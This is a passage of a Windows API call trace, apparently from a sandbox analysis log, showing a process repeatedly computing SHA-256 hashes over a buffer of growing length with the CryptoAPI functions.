	[0118.539] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.539] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc1d0
	[0118.539] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc1d0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc1d0, pdwDataLen=0x129364) returned 1
	[0118.539] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.539] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.539] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.540] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.540] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0118.540] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.540] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc1f8
	[0118.540] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc1f8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc1f8, pdwDataLen=0x129364) returned 1
	[0118.540] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.540] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.540] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.540] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.540] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0118.540] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.540] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc220
	[0118.540] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc220, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc220, pdwDataLen=0x129364) returned 1
	[0118.540] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.540] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.540] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.541] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.541] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0118.541] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.541] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc248
	[0118.541] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc248, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc248, pdwDataLen=0x129364) returned 1
	[0118.541] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.541] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.541] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.541] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.541] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0118.541] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.541] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc270
	[0118.541] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc270, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc270, pdwDataLen=0x129364) returned 1
	[0118.541] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.541] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.541] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.542] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.542] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0118.542] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.542] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc298
	[0118.542] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc298, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc298, pdwDataLen=0x129364) returned 1
	[0118.542] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.542] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.542] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.542] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.542] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0118.542] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.542] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc2c0
	[0118.542] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc2c0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc2c0, pdwDataLen=0x129364) returned 1
	[0118.542] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.542] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.542] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.543] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.543] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0118.543] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.543] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc2e8
	[0118.543] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc2e8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc2e8, pdwDataLen=0x129364) returned 1
	[0118.543] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.543] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.543] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.543] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.543] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0118.543] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.543] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc310
	[0118.543] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc310, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc310, pdwDataLen=0x129364) returned 1
	[0118.543] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.543] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.543] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.544] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.544] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0118.544] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.544] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc338
	[0118.544] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc338, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc338, pdwDataLen=0x129364) returned 1
	[0118.544] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.544] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.544] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.544] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.544] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0118.544] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.544] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc360
	[0118.544] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc360, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc360, pdwDataLen=0x129364) returned 1
	[0118.544] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.544] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.544] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.545] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.545] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0118.545] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.545] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc388
	[0118.545] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc388, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc388, pdwDataLen=0x129364) returned 1
	[0118.545] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.545] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.545] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.545] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.545] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0118.545] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.545] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc3b0
	[0118.545] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc3b0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc3b0, pdwDataLen=0x129364) returned 1
	[0118.545] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.545] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.545] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.546] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.546] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0118.546] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.546] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc3d8
	[0118.546] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc3d8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc3d8, pdwDataLen=0x129364) returned 1
	[0118.546] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.546] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.546] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.546] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.546] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0118.546] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.546] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc400
	[0118.546] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc400, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc400, pdwDataLen=0x129364) returned 1
	[0118.546] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.546] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.546] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.547] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.547] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0118.547] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.547] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc428
	[0118.547] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc428, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc428, pdwDataLen=0x129364) returned 1
	[0118.547] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.547] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.547] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.547] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.547] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0118.547] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.547] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc450
	[0118.547] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc450, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc450, pdwDataLen=0x129364) returned 1
	[0118.547] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.547] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.547] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.548] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.548] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0118.548] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.548] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc478
	[0118.548] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc478, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc478, pdwDataLen=0x129364) returned 1
	[0118.548] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.548] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.548] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.548] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.548] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0118.548] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.548] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc4a0
	[0118.548] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc4a0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc4a0, pdwDataLen=0x129364) returned 1
	[0118.548] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.548] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.548] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.549] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.549] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0118.549] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.549] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc4c8
	[0118.549] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc4c8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc4c8, pdwDataLen=0x129364) returned 1
	[0118.549] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.549] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.549] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.549] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.549] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0118.549] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.549] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc4f0
	[0118.549] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc4f0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc4f0, pdwDataLen=0x129364) returned 1
	[0118.549] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.549] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.549] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.550] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.550] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0118.550] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.550] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc518
	[0118.550] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc518, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc518, pdwDataLen=0x129364) returned 1
	[0118.550] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.550] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.550] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.550] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.550] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0118.550] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.550] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc540
	[0118.550] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc540, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc540, pdwDataLen=0x129364) returned 1
	[0118.550] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.550] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.550] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.551] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.551] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0118.551] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.551] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc568
	[0118.551] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc568, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc568, pdwDataLen=0x129364) returned 1
	[0118.551] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.551] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.551] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.551] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.551] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0118.551] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.551] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc590
	[0118.551] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc590, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc590, pdwDataLen=0x129364) returned 1
	[0118.551] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.551] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.552] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.552] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.552] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0118.552] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.552] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc5b8
	[0118.552] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc5b8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc5b8, pdwDataLen=0x129364) returned 1
	[0118.552] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.552] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.552] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.553] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
